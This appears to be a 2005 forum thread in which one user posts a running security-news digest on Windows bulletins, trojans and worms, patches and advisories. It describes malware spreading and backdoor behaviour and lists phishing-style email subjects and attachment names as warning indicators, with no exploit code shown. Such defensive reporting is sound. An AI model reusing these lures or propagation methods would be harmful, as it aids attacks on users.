#18 SpywareKilla
#19 BPS Spyware Remover
#20 Adware Remover Gold -
July 18, 2005 at 8:00 pm #3188754
MS05-037: Trojan.Jevprox
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Trojan.Jevprox is a downloader Trojan that exploits the Microsoft Internet Explorer Javaprxy.DLL COM
Object Instantiation Heap Overflow Vulnerability (described in Microsoft Security Bulletin MS05-037). -
July 19, 2005 at 11:57 am #3189782
Wall Street Journal – Excellent Article on Cybercrime
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The Wall Street Journal features a lengthy and excellent article of CyberCrime.
-
July 19, 2005 at 2:22 pm #3189724
Phlooding – Possible New “Zero Day” Wireless Network Attack
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
As the ISC describes, these “PH” based buzzwords are getting interesting 😉
Phlooding – Possible New “Zero Day” Wireless Network Attack
AirMagnet has published a press release describing a new zero-day attack they have discovered that targets wireless networks. The press release describes an attack where several geographically disperse systems launch a flood of authentication attempts against an IEEE 802.1x authentication server (using an EAP type such as PEAP or TTLS). This may cause the authentication server to experience performance degradation, and may cause valid user accounts to be locked out from multiple failed login attempts.
-
July 20, 2005 at 6:21 am #3176121
Banker Trojan Horses – Steals banking password information
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
F-Secure is highlighting a series of stealth-like trojans can hide on PCs and transmit keystrokes for user accounts and passwords.
Banker Trojan Horses – Steals banking password information
Banker is a family of spying trojans that try to steal information that is required to access certain on-line banks’ and on-line payment systems’ websites. Banker trojans usually steal logins, passwords, PINs, check words and other info related to logging to bank websites.
The stolen information is usually uploaded to a hacker’s website using a webform. The most vulnerable are users of on-line banks and payment systems that have logins and passwords that do not change every time a user logs on. That is why many banks are now switching to one-time passwords that expire after being used once.
-
July 21, 2005 at 6:21 am #3195794
phpBB 2.0.17 – New release provides security updates
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The new phpBB 2.0.17 release fixes some security issues due to XSS and provides additional new features
phpBB 2.0.17 – New release provides security updates
Tutorial for heavily moderated boards
What has changed in this release?
* Added extra checks to the deletion code in privmsg.php
* Fixed XSS issue in IE using the url BBCode
* Fixed admin activation so that you must have administrator rights to activate accounts in this mode
* Fixed get_username returning wrong row for usernames beginning with numerics
* Pass username through phpbb_clean_username within validate_username function
* Fixed PHP error in message_die function
* Fixed incorrect generation of {postrow.SEARCH_IMG} tag in viewtopic.php
* Also fixed above issue in usercp_viewprofile.php
* Fixed incorrect setting of user_level on pending members if a group is granted moderator rights
* Fixed ordering of forums on admin_ug_auth.php to be consistant with other pages
* Correctly set username on posts when deleting a user from the admin panel
-
July 21, 2005 at 10:22 am #3193881
Article: Analyzing Browser Based Vulnerability Exploitation Incidents
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This is an excellent article on the analysis of Browser Based Exploits from one of Microsoft’s experts in the field:
Analyzing Browser Based Exploitation Incidents
QUOTE: As a security researcher on the Secure Windows Initiative, I frequently analyze malicious web sites to answer the following questions:
- What vulnerabilities are being exploited?
- If known vulnerabilities are being exploited, which updates resolve the vulnerabilities?
- If malware is being installed, what is it?
-
July 21, 2005 at 12:27 pm #3193791
Sundor.A – Destructive Word Virus with Alien Greeting
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
If you open an infected Word document with the Sundor-A virus, it will display a greeting from an “alien”. It then deletes programs/documents, disables security software, and leaves compromised PCs open to further attack.
-
July 21, 2005 at 4:26 pm #3186483
VISA/AMEX cut ties with Card System Solutions after privacy leak
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
After October 2005, VISA and American Express will no longer use Card System Solutions as a processing agent due to the major privacy incidents experienced earlier this year.
VISA/AMEX cut ties with Card System Solutions after privacy leak
JULY 20, 2005 (COMPUTERWORLD) – Visa U.S.A. Inc. and American Express Co. are terminating their contracts with a credit card transaction processing company that was hit by hacker attacks, potentially exposing 40 million card numbers to online intruders.
In separate announcements, Visa and American Express said they are ending their relationships with CardSystems Solutions Inc. in Atlanta because the company didn’t meet its contractual requirements in providing processing services for merchants that accept the credit cards. The companies will no longer allow CardSystems to process their transactions after October.
-
July 22, 2005 at 8:26 am #3186237
MS05-036: Color Management Exploit Code in Wild
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Please ensure you are up-to-date on all Microsoft security bulletins as a new exploit based on the July 2005 updates has been discovered in the wild. So far, the new threat will only crash Internet Explorer, but it could be tailored into a more harmful threat that might impact unpatched systems.
ISC Warning: MS05-036: Color Management Exploit Code in Wild
Frsirt: Microsoft Color Management Module Buffer Overflow Exploit (MS05-036) — Please be careful as actual exploit code is found here
QUOTE: We’ve received reports that the Color Management Module ICC Profile Buffer Overflow Vulnerability has exploit code available and is being used out in the wild. The vulnerability information from Microsoft is available over at MS Technet. The mitigate this vulnerability, apply the appropriate patch. It appears that this version of the exploit code will only crash the browser, but it wouldn’t be difficult to put in code for execution. FrSIRT put out an advisory on the code being in the wild this morning.
-
July 22, 2005 at 12:26 pm #3185761
Windows Vista – New Official name for Longhorn
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Microsoft Press Announcement – Windows Vista
Tech Republic Article – Windows Vista
REDMOND, Wash., July 22, 2005 — Today Microsoft Corp. announced the official name of its next-generation Windows® client operating system, formerly code-named “Longhorn.” Vista’s three design goals include better security, new ways to organize information, and seamless connectivity to external devices, the company said.
-
July 22, 2005 at 8:26 pm #3185574
Microsoft Windows Vista Home Page
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
-
July 23, 2005 at 4:26 am #3194395
MySQL patches ZLIB remote security vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
A new critical security patch to address buffer overflow vulnerabilities in ZLIB library processing. This update should be processed promptly to ensure applications are properly protected.
MySQL Reference Manual :: D.2.2 Changes in release 4.1.13
Security improvement: Applied a patch that addresses a zlib data vulnerability that could result in a buffer overflow and code execution. (CAN-2005-2096) (Bug #11844)
MySQL Multiple Vulnerabilities
Secunia Advisory: SA16170
Release Date: 2005-07-22
Highly critical
Impact: DoS, System access
Where: From remote
Solution Status: Vendor Patch
Software: MySQL 4.x -
July 23, 2005 at 8:26 am #3194355
Gael/Tenga – New Parasitic CIH-like File Infector
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Kaspersky Labs documents the first return of a classical parasitic file infector virus in about two years. Like the CIH virus, it will attempt to infect as many EXE files as possible on the PC, plus download secondary viruses which can spread rapidly throughout an unpatched network. A single PC can have hundreds or even thousands of copies of this virus as it self replicates on the PC.
Kaspersky Labs – Analyst’s Commentary
Kaspersky Labs – Tenga.A Description
Tenga is a good old classic virus, where the main goal is to self-replicate as much as possible. Once your machine is infected, you can end up with hundreds of infected files, all of which will then attempt to download Trojan-Downloader.Win32.Small.bdc
When run, the worm infects .EXE files on the local system, appending itself to host files. 10 threads are created to search for infectable computers on the Internet, SYN packets are sent to random IP addresses on TCP 139 (netbios). The worm then attempts to connect to responding systems via the IPC$ and open shares to parasitically infect files remotely.
-
July 23, 2005 at 8:26 pm #3194274
MS05-020: Trojan.Helemoo exploits IE on unpatched systems
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This new Trojan Horse takes advantage of an IE vulnerability patched by Microsoft during April 2005.
MS05-020: Trojan.Helemoo – Symantec Description
Trojan.Helemoo is a back door Trojan that exploits the Microsoft Internet Explorer DHTML Object Race Condition Memory Corruption Vulnerability (described in Microsoft Security Bulletin MS05-020).
-
July 24, 2005 at 8:26 am #3194200
US CERT – Summary Page of Current Activities
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
As CERT has been a favorite resource for security news and information, this new link discovered provides a summary of key items and is beneficial to bookmark:
-
July 24, 2005 at 8:26 am #3194201
New Oracle Vulnerabilities in Reporting Tools
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
US-Cert has highlighted a number of new vulnerabilities in Oracle and DBAs or system administrators should apply the latest security updates.
US-CERT Oracle Vulnerability Advisories
Red Hat Oracle Security Alerts – Published Oracle Security Alerts
19-jul-2005 – Advisory: Various Cross-Site-Scripting Vulnerabilities in Oracle Report – [Various CSS in Oracle Reports] (Not fixed after 718 days)
19-jul-2005 – Advisory: Read parts of any XML-file on the application server via Oracle Report – [Read parts of any XML file via Oracle Reports](Not fixed after 693 days)
19-jul-2005 – Advisory: Read parts of any file on the application server via Oracle Report – [Read parts of any file via Oracle Reports] (Not fixed after 692 days)
19-jul-2005 – Advisory: Overwrite any file on the application server via Oracle Report – [Overwrite files via Oracle Reports] (Not fixed after 706 days)
19-jul-2005 – Advisory: Run any OS Command via uploaded Oracle Report from any directory- [Run any OS command via Oracle Reports] (Not fixed after 663 days)
19-jul-2005 – Advisory: Run any OS Command via uploaded Oracle Forms from any directory- [Run any OS command via Oracle Forms] (Not fixed after 664 days) -
July 25, 2005 at 4:26 pm #3193686
Bagle.BD – New Bagle variant emerges
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
A new variant of the Bagle.BD virus has just emerged and the following email messages should be blocked or avoided.
Bagle.BD Information – Trend Micro
Bagle.BD Information – Secunia
From: {Spoofed email address}
Subject: Foto
Message body: (any of the following)
• Foto
• Pass – {password of the attachment}
• Password – {password of the attachment}
• Password: {password of the attachment}
• The password is {password of the attachment}
Attachment: (any of the following)
• Foto.zip
• fotos.zip -
July 26, 2005 at 8:26 am #3193449
Zone Alarm 6.0 Released – New Free & Licensed Versions
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
I’ve personally used Zone Alarm for years starting with the first version when the company was new. Version 6.0 has been released and I plan to update and test this new version.
Zone Alarm 6.0 – Download Center
-
July 26, 2005 at 8:26 am #3193448
SANS updates top 20 security vulnerabilities for 1st half of 2005
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Top Vulnerabilities to Windows Systems
- W1 Web Servers & Services
- W2 Workstation Service
- W3 Windows Remote Access Services
- W4 Microsoft SQL Server (MSSQL)
- W5 Windows Authentication
- W6 Web Browsers
- W7 File-Sharing Applications
- W8 LSAS Exposures
- W9 Mail Client
- W10 Instant Messaging
Top Vulnerabilities to UNIX Systems
- U1 BIND Domain Name System
- U2 Web Server
- U3 Authentication
- U4 Version Control Systems
- U5 Mail Transport Service
- U6 Simple Network Management Protocol (SNMP)
- U7 Open Secure Sockets Layer (SSL)
- U8 Misconfiguration of Enterprise Services NIS/NFS
- U9 Databases
- U10 Kernel
-
July 27, 2005 at 5:56 am #3194715
SPAM EMAIL – Why Unsubscribing is not a good idea
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
An excellent example of why you should never click on a URL in a spam email message.
Kaspersky Weblog: Why Unsubscribing from spam is not a good idea
QUOTE: Today I ran across an interesting piece of spam. The ending contained an offer to unsubscribe by clicking “here”. Naturally, I clicked and landed on a web page (HTML) that supposedly checked my name against a database. The page then showed me the following message: “your address has been removed from the mailing list”.
Sounds reasonable, doesn’t it? But … the end of the HTML file contains Exploit.HTML.Mht which uses the MHTML URL Processing Vulnerability to download malware: in my case it was Trojan-Dropper.Win32.Small.gr and Trojan-Spy.Win32.Banker.s.
Good reminder – never, ever unsubscribe from spam. At best you let the spammer know your address is live, and at worst you end up with an infected computer. Read more:
Malware Evolution: January to March 2005
Microsoft Security Bulletin MS04-013 -
July 27, 2005 at 5:03 pm #3195749
-
July 28, 2005 at 9:04 am #3190984
Internet Explorer 7 Beta 1 – Technology Overview
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The following link provides publicly announced information by Microsoft on the first beta release for IE 7 which will be oriented for the XP SP2 and Vista Beta platforms.
-
July 28, 2005 at 1:20 pm #3190848
Microsoft Windows Vista Beta 1 Fact Sheet
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
-
July 29, 2005 at 1:20 pm #3185913
Opera 8.02 – New version patches 3 security vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Version 8.02 of Opera addresses three security advisories as well as providing functional improvements to the browser.
Changelog for Opera 8.02 for Windows
Security Enhancements
- Solved download dialog spoofing issue described in Secunia Advisory SA15870
- Fixed image dragging issue described in Secunia Advisory SA15756
- Prevented link hijacking issue described in Secunia Advisory SA15781
Additional Enhancements
- Improved default handling of encodings in spelling checker.
- Multiple stability fixes.
- When an installed plug-in is available, use as default handler rather than display download dialog.
- Fixed issue where search.ini could be picked up from wrong location.
- Improved support for XMLHttpRequest.
- Fixed download handling when closing originating page..
-
July 29, 2005 at 5:23 pm #3182401
Downloader.Win32.VB.JL (includes Parite and Adware attacks)
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Kaspersky documents a new combined risk of a downloader, adware agent, and file infector all combined into a single attack. It’s important to be careful with email and URLs or attachments that might be in untrusted messages.
Downloader.Win32.VB.JL + Parite File Infector
http://www.viruslist.com/en/weblog?calendar=2005-07QUOTE: A few days ago we got another Trojan-Dropper. When we analyzed it, we found out that it installs 4 files to the system. Nothing out of the ordinary for a dropper. But then we discovered that while one of the files it drops is detected as Trojan-Downloader.Win32.VB.jl, our scanner told us that the other three are infected with Virus.Win32.Parite.b
What’s all this about? Someone is trying to spread Parite? We’ve known about this virus for a number of years, and it’s still one of the most widespread classic file viruses found in the wild. But we haven’t seen it being deliberately spread for a long time.
The answer was simple, and unexpected. When we cleaned the virus from the infected files, we discovered that underneath the Parite infection, the files were infected with three other Trojan-Downloaders – WinAD.c, IstBar.is and Small.aqt, which Kaspersky Anti-Virus has detected for a long time.
All of these programs are designed to download adware onto the victim machine. So it seems likely that whoever created the original dropper didn’t know that the machine he used was infected with Parite. On the other hand, it could just be another attempt on the part of virus writers to prevent their creations being detected by dedicated anti-adware and anti-spyware solutions, which can’t detect standard file viruses.
-
July 29, 2005 at 5:23 pm #3182402
Malek Tips – Spyware and Adware Info and Removal Tips
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This site has a number of “free for personal use” and “trial versions” of spyware.
-
July 29, 2005 at 5:23 pm #3182403
Windows Vista – An indepth review by PC Magazine
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
PC Magazine provides an in-depth report on the first beta of Windows Vista
http://www.pcmag.com/article2/0,1895,1840816,00.asp
WHAT’S TO COME… 2006
[2005]
July 27: Vista beta 1 ships
Mid-September: Beta 1 Refresh at Microsoft
Professional Developers Conference[2006]
First half: Vista beta 2
Q2/Q3: Vista release to manufacturing
Holiday season: Vista retail releasetable of contents Hands On with the Next Windows • Introduction • Vista’s New Look • Performance and Reliability • Deployment and Management • Vista as a Platform • Coulda, Woulda, Shoulda • Glossary: The Long and Short of It • Windows Security: This Time for Sure! • The Beta Program • Internet Explorer 7 -
July 30, 2005 at 9:20 pm #3182162
NIST: Minimum Security Requirements for Federal Information Systems
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
NIST has developed a report on minimum security requirements for federal information systems. This planning study might be valuable for companies to look at for ways and priorities associated with strengthening their security during the coming year.
NIST: Minimum Security Requirements for Federal Information Systems
-
July 31, 2005 at 5:20 am #3182113
Cisco Security Advisory 65783: IPv6 Crafted Packet Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
CERT: CISCO IPv6 vulnerability VU#930892
Cisco Systems devices running IOS that are configured to handle Internet Protocol version 6 (IPv6) traffic may not properly handle a specially-crafted packet sent from the local network segment. This improper packet handling may result in a denial-of-service condition or in the execution of arbitrary code on the device running IOS.
The specific nature of the crafted packets exploiting this vulnerability is not known.
Only devices configured to handle IPv6 traffic are vulnerable to this flaw. Any logical or physical interface that handles the crafted packet is vulnerable to the flaw. In addition, the attacker must send the crafted packet on the local network segment. Packets sent one or more hops away from the device will not affect the vulnerable device in a negative manner.For details on fixes, updates, and workarounds, please see
Cisco Security Advisory 65783: IPv6 Crafted Packet Vulnerability.
Summary
Affected Products
Details
Impact
Software Versions and Fixes
Obtaining Fixed Software
Workarounds
Exploitation and Public Announcements
Status of This Notice: INTERIM
Distribution
Revision History
Cisco Security Procedures -
August 2, 2005 at 5:20 pm #3196302
MyDoom.CH – New Variant (appears to be from email adminstrator)
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
All new MyDoom variants should be carefully watched. These email messages appear to be official email administrator warnings that should be deleted and not opened.
MyDoom.CH – New Variant (appears to be from email adminstrator)
Subject:
Your password has been updated
Your password has been successfully updated
You have successfully updated your password
Your new account password is approved
Your Account is Suspended
*DETECTED* Online User Violation
Your Account is Suspended For Security Reasons
Warning Message: Your services near to be closed.
Important Notification
Members Support
Security measures
Email Account Suspension
Notice of account limitationAttachment Name:
updated-password
email-password
new-password
password
approved-password
account-password
accepted-password
important-details
account-details
email-details
account-info
document
readme
account-reportExtension Suffix on Attachment:
.pif
.scr
.exe
.cmd
.batTCP/IP BACKDOOR:
Opens a back door by connecting to an IRC server running on a hostile domain on TCP port 6667. -
August 3, 2005 at 9:20 am #3051709
MS04-028: “Never say Never” (JPEG risks could increase)
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
For years, we all thought JPEGs were safe until MS04-028 taught us to “Never say Never” as one of my favorite weblogs shares in the August 2nd commentary.
A recent MS04-028 attack (i.e., downloader for Backdoor.Win32.Haxdoor.dw) that wasn’t properly tested by the virus writers and didn’t work properly. However, as Kaspersky analysts noted easy modifications could make JPEGs a more substantialrisk, esp. on unpatched PCs.
It definitely pays to be patched up on MS security updates, AV protection, and the latest Firewall software.
Kaspersky Weblog: Never say Never (JPEG risks) – Aug 2, 2005
http://www.viruslist.com/en/weblog -
August 4, 2005 at 9:20 am #3051221
Windows Vista – First Proof-of-Concept MSH based Virus
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
These MSH based proof-of-concept viruses depend on whether the Monad shell interface will be ultimately included with Vista. Most likely the MSH environment will be further secured as Microsoft progresses in the beta testing process.
F-Secure Weblog: Windows Vista – 1st Proof-of-Concept MSH based Virus
F-Secure: Danom MSH based POC virus description
QUOTE: An Austrian virus writer has published five simple viruses targeting Microsoft MSH in a virus writing magazine. MSH, or Microsoft Command Shell, is a command line interface and scripting language. It’s basically a replacement for shells such as CMD.EXE, COMMAND.COM or 4NT.EXE and will ship in 2006. As a command-line front end, MSH resembles many Unix shells quite a bit.
As MSH (codenamed ‘Monad’) was scheduled to ship as the default shell for Windows Vista (which went to first beta last week), you could argue that these are the first viruses for Windows Vista. However, it has lately been rumoured that MSH might not ship with Vista at all – instead might be part of Microsoft Exchange 2006 or something. We won’t know for sure until later.
-
August 5, 2005 at 12:29 pm #3051971
Core flaw opens Windows 2000 to attack
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Core flaw opens Windows 2000 to attack
A serious flaw has been discovered in a core component of Windows 2000, with no possible work-around until it gets fixed, a security company said. The vulnerability in Microsoft’s operating system could enable remote intruders to enter a PC via its IP address, Marc Maiffret, chief hacking officer at eEye Digital Security, said on Wednesday. As no action on the part of the computer user is required, the flaw could easily be exploited to create a worm attack, he noted.
What may be particularly problematic with this unpatched security hole is that a work-around is unlikely, he said. “You can’t turn this [vulnerable] component off,” Maiffret said. “It’s always on. You can’t disable it. You can’t uninstall.”
-
August 6, 2005 at 8:29 am #3052451
Windows Vista – More secure than reported to combat 1st “virus”
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Lee Holmes, works on the team building the Vista Monad scripting environment. In his blog, he shares a great response on the new Damon “virus” variants (5 so far) designed to interact with the new Vista Monad environment.
This is a good read as it is chockful of great security points (e.g., think before you click, use non-admin accounts, don’t use out-of-the-box security defaults, etc).
Lee Holmes Blog – Monad and the “First Vista Virus”
Windows Vista – First Proof-of-Concept MSH based Virus
QUOTES:
It’s a misleading title, as it’s an issue that affects any vehicle for any executable code on any operating system.
To protect yourself against the point of entry, follow the guidance suggested by Microsoft’s Malware FAQ: The best way to stop viruses is to use common sense. If an executable computer program is attached to your e-mail and you are unsure of the source, then it should be deleted immediately. Do not download any applications or executable files from unknown sources, and be careful when trading files with other users.
To limit the amount of damage that the malicious code can do, try to limit the amount of time you run as Administrator / root.
To combat this, Monad has three features to help: not installing a shell association by default, configurable execution policies (along with digitally signing scripts,) and not running scripts from the current directory.
As for not running scripts in the current directory, Monad follows a policy similar to that of Unix shells: we do not run them, unless you explicitly ask us to.
-
August 6, 2005 at 8:29 am #3052452
CERT: Vulnerability in CA BrightStor ARCserve Backup Agents
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
US-CERT is reporting vulnerabilities, public exploits, and increased scans on port 6070 associated with the CA BrightStor ARCserve Backup Agents. Please quickly perform security updates if you use this product.
Computer Associates Advisory and Security Patch Information
US-CERT Advisory – Vulnerability in CA BrightStor ARCserve Backup Agents
US-CERT Advisory – Increased Scanning in Port 6070 used by CA BrightStor ARCserve Backup Agents
QUOTE: Computer Associates BrightStor ARCserve Backup system contains a buffer overflow vulnerability that may allow remote attackers to execute arbitrary code or cause a denial of service condition. The vulnerability exists in several BrightStor ARCserve Backup Agents, such as BrightStor ARCserve Backup Agent for Microsoft SQL server, and is due to improper bounds checking performed on data sent to ports 6070 and 6050. Remote attackers can exploit this vulnerability to either crash the agent or to overflow the buffer and execute arbitrary code with SYSTEM privileges.
-
August 7, 2005 at 4:29 am #3052330
SANS – Malicious URL Inventory Project
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Just like we should never click on attachments, the same principle goes for untrusted URLs. SANs is building an inventory site of these through their new submission site, allowing contributions from the general public. This might be a valuable future research tool, as I favor shutting hostile sites down.
-
August 9, 2005 at 4:29 am #3050760
ISC – Protecting your corporate assets and network
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
While the primary focus of network protection is on botnets, these tips are essential best practices to ensure the privacy and confidentially of corporate information is protected.
ISC – Protecting your corporate assets and network
Centralize network egress — If you haven’t already consolidated your access to the Internet, fighting the botnet fight will be that much harder if your networks have many paths to the public Internet at large.
Employ Egress filtering — Block everything going out to the world that is unnecessary for business. Policies are a good candidate for a new bullet point, so if you don’t have them currently in place develop them. Do you connect to windows fileshares on the net? Block outbound access. Do you tftp gets and puts to the net? Block outbound access. Better yet, start from scratch and block everything, Establish your minimum outbound networking requirements, allow just that, and require all new connectivity to navigate an access request process. Force web traffic through restrictive proxy servers, arbitrary outbound TCP port 80 and 443 is a nightmare waiting to happen, or maybe just waiting for you to discover.
Centralize your logging — Without easy access to logging from Firewalls, VPN concentrators and other network devices finding the threat from within becomes unnecessarily complicated.
Deploy Intrusion Sensors — Finding the traditional IRC based botnet with intrusion sensor technology is easy and unending fun. Really. Unending fun. HTTP and UDP based bots get a bit trickier but are not impossible to detect
DNS – Blackholes, Poisoning and Reporting — If you have control of your DNS infrastructure you can protect your networks by intentionally poisoning “your” internal resolvers. You can establish zone files for known malicious botnet controller hostnames that would effectively prevent botnet herding miscreants from gaining control of any botted hosts on your network through the update of DNS records which could evade your null route on any previously known botnet controller
-
August 9, 2005 at 12:29 pm #3052599
Microsoft Security Bulletins – August 2005
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Microsoft Security Bulletins – August 2005
CRITICAL: Cumulative Security Update for Internet Explorer (896727)
CRITICAL: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (896423)
IMPORTANT: Vulnerability in Telephony Service Could Allow Remote Code Execution (893756)
MODERATE: Vulnerability in Remote Desktop Protocol Could Allow Denial of Service (899591)
RELEASED: Vulnerabilities in Microsoft Word May Lead to Remote Code Execution (890169)
RELEASED: Vulnerability in Microsoft Agent Could Allow Spoofing (890046)
-
August 9, 2005 at 8:29 pm #3052477
Internet Storm Center – Analysis of Microsoft August 2005 Security Updates
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The Internet Storm Center provides a comprehensive analysis of Microsoft Security Updates each month. This update should be installed as soon as possible, as some vulnerabilities could be reverse engineered into exploits.
Internet Storm Center – Analysis of Microsoft August 2005 Security Updates
-
August 10, 2005 at 3:49 pm #3052817
Microsoft Update – New Windows/Office Consolidated Updates
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The new Microsoft Update provides for all Windows, Office, and other Microsoft based updates to be managed through a single update facility.
Select the link below to try this new facility:
Microsoft Update offers you everything you get through Windows Update, plus updates for Office and other Microsoft applications, all in one place. The Automatic Update feature is included in Microsoft Update so there is no more guesswork. Keep your computer more secure, up-to-date, and performing at its best with Microsoft Update
-
August 11, 2005 at 11:49 am #3048119
MS05-038 & MS05-041 — Proof of Concept Exploits developed
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Below are brand new Proof of Concept exploits from the August 2005 updates. These were reverse engineered during the first day security patches for MS05-038 and MS05-041 were published by Microsoft.
-
August 11, 2005 at 7:49 pm #3049298
Veritas Backup – Zero day exploit in wild
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
QUOTE: FrSIRT has released an advisory containing what they call “Veritas Backup Exec Windows Agent Remote File Access Exploit (0day)” The ISC has already seen an increase in scans for port 10000, and advise any users of Backup Exec deny access to that port from all untrusted networks.
ISC Veritas Backup – Zero day exploit in wild
FRSIRT – BackupExec Exploit
FRSIRT – Veritas Backup – Zero day Advisory Key Safeguard: Restrict access to port 10000.
-
August 11, 2005 at 7:49 pm #3049297
MS05-039 Exploit Developed
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
-
August 12, 2005 at 7:49 am #3049137
Bagle.CF – New variant uses “Taxes” theme (medium risk at F-Secure)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
As noted, in F-Secure’s weblog belong, the author of the Bagle virus family has been active in the past week or so. This new variant uses a theme of “increases in taxes” in it’s social engineering approach. F-Secure ranks this as 2 of 3 (Medium Risk)
F-Secure – Bagle.CF Information
Computer Associates – Bagle.BQ
Symantec – Beagle.CE Description
F-Secure Log (Aug 12): Two certain things in life: Bagle and taxes
Kaspersky Log (Aug 11): Bagle Author back from vacation
Another new Bagle variant – Bagle.CF has been found on August 11th, 2005. This variant is very similair to previous variant, Bagle.BY. Bagle.CF comes inside a RAR archive containing file ‘Taxes.exe’. The name of the RAR archive can vary, but is somehow Tax-related, for example ‘Increase_in_the_tax.rar’. Instead of picture icon, Bagle.CF uses text file icon.
E-mail FormatFrom: <spoofed>
Subject: Blank
Message Body: Blank
The Attachment name is selected from the following list:
Taxes.zip
The_taxation.zip
The_reporting_of_taxes.zip
Work and taxes.zip
Increase_in_the_tax.zip
To_reduce_the_tax.zipThe ZIP attachment contains: Taxes.exe
-
August 12, 2005 at 7:49 am #3049138
Microsoft August 2005 Security Bulletins — FrSirt reports 5 New Exploits already
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
At least five separate exploits have been developed so far. In particular the MS05-039 exploits could represent serious threats and everyone is urged to update their systems to the latest levels of protection as soon as possible.
2005-08-11 : Microsoft Windows Plug and Play Remote Buffer Overflow Exploit (MS05-039)
2005-08-11 : Microsoft Windows 2000 Plug and Play Universal Remote Exploit (MS05-039)
2005-08-11 : Microsoft Internet Explorer COM Objects File Download Exploit (MS05-038)
2005-08-09 : Microsoft Internet Explorer COM Objects Instantiation Exploit (MS05-038)
2005-08-09 : Microsoft Windows Remote Desktop Protocol DoS Exploit (MS05-041)
-
August 12, 2005 at 7:49 am #3049139
McAfee ePO Local Privilege Escalation Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
This impacts corporate users and so far there are no reports of any exploits in-the-wild
McAfee ePO Local Privilege Escalation Vulnerability
http://www.frsirt.com/english/advisories/2005/1402A vulnerability was identified in McAfee ePolicy Orchestrator, which may be exploited by local attackers to obtain elevated privileges. This flaw is due to an access validation error where the default document root directory for the ePolicy Orchestrator Agent Web server is installed with “Everyone/Full Control” privileges, which could be exploited by local attackers to create directory symbolic links and gain SYSTEM access, via the ePolicy Orchestrator Agent Web server, to the contents of arbitrary files and directories located in the same partition as the affected directory.
-
August 13, 2005 at 7:49 am #3047444
Internet Storm Center – Moves to Yellow alert status
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The ISC is promoting awareness and the need to quickly patch up, by moving to the rare yellow condition. The Bagle attacks, the Veritas zero day exploit, and at least six August Windows exploits are signs we are indeed in an ACTIVE cycle.
Internet Storm Center – Moves to Yellow alert status
QUOTE: Infocon: Yellow — Due to a number of very well working Windows exploits for this weeks patch set, and the zero-day Veritas exploit, we decided to turn the infocon to yellow.
Advice: Use the weekend to patch ALL WINDOWS SYSTEMS. It may be worthwhile to consider accelerated deployment of the patches even to critical systems if the weekend is slow anyway. Backup Exec should be firewalled or disabled at this point.
Note: Consider unprotected internet facing machines infected at this point if they do not have this weeks patches applied. Patch and handle them with extra care.
We are currently tracking a significant new threat. The impact is either unknown or expected to be minor to the infrastructure. However, local impact could be significant. Users are adviced to take immediate specific action to contain the impact. Example: ‘MSBlaster’ worm outbreak.
-
August 14, 2005 at 7:49 am #3048641
MS05-039: Zotob.A Internet Worm — In-the-wild
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
